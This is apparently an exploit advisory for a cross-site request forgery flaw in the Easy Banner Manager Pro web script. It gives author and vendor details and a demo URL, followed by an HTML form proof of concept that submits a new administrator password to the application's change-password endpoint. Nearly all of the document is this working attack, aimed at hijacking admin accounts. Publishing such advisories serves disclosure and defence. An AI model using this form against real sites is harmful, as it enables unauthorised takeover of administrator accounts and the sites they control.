Easy Banner Manager Pro suffers from a cross site request forgery vulnerability.
0b124b38f38d74997d32bec1729532540f80d2fc865b527db8bf06712fe2ce49
# Exploit Title: Easy Banner Manager Pro [CSRF] / (change admin password)
# Author: Jonturk75
# Vendor or Software Link: www.scripts.com/viewscript/easy-banner-manager-pro/32281/
# Category:: webapps
# Demo site: http://demo.scriptsez.net/ebm/demo.html
<form method=post action=?action='ad.php?action=change'&mode=verify>
<input type=text name=admin_id value="admin"><input type=password name="admin_pass">
<input type=password name="cpass">
<input type=submit value=Change>
</form>